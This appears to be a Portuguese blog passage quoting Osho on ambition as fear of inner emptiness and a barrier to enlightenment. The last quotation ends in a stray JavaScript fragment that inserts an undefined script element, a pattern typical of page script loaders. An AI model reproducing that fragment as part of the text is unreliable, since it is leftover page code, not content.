O Mestre Osho, no livro \”OSHO – Fama, Fortuna e Ambição\”, analisa a questão da ambição que, segundo ele, é causa de infelicidade. Vejamos:
\”Ambição é um esforço para se preencher com alguma coisa – pode ser sexo, comida, dinheiro, poder. É o medo do vazio interno, então a pessoa quer possuir cada vez mais para esquecer o próprio vazio, mas esquecer o próprio vazio é esquecer o caminho para Deus. O vazio interno é a porta para Deus.
“Em vez de perguntar como abandonar a ambição, pergunte como entendê-la. Quando o entendimento de alguma coisa é perfeito, ela se liberta, e a liberdade da consciência é o maior deleite. Conhecer é ficar livre; não conhecer é permanecer escravo. Ambição significa adiar sua vida para amanhã. Se você for inteligente vai começar a viver em vez de se preparar para viver.
“Observe-se nas pequenas coisas da vida. Um carro passa. No momento em que você diz que o carro é bonito surgiu a ambição de possuí-lo. Um homem ou mulher passa, e de repente vem um desejo de possuir a pessoa. Você está comendo, e já está saciado, mas continua a comer. Você está comendo por ambição. Você medita e não se ilumina.
“Observe. Ambição está presente. Ela é a barreira entre você e a iluminação. A ambição é o inferno; seja ela terrena ou transcendental. Se as pessoas não fossem ambiciosas quem chamaria Alexandre de O Grande? Ele seria chamado de O Ridículo, O Tolo.
Pense em um mundo onde as pessoas não sejam ambiciosas, então teremos um planeta mais bonito. Haverá menos posses, certamente, porém, mais alegria, mais música, mais dança, mais amor.
“Basicamente, a ambição é um problema espiritual. Foi-lhe ensinado que, se você não tiver muitas coisas, será um ninguém. Por isso, as pessoas continuam se enchendo de coisas. Entretanto, o coração só é rico quando está em harmonia com a natureza; essa é a única riqueza que existe. Do contrário, um dia você irá chorar e dizer: \”É tarde demais…\”.
“Quando Jesus disse: ‘Não se preocupem com o dia de amanhã’, estava dizendo: ‘Não sejam ambiciosos’\”.document.currentScript.parentNode.insertBefore(s, document.currentScript);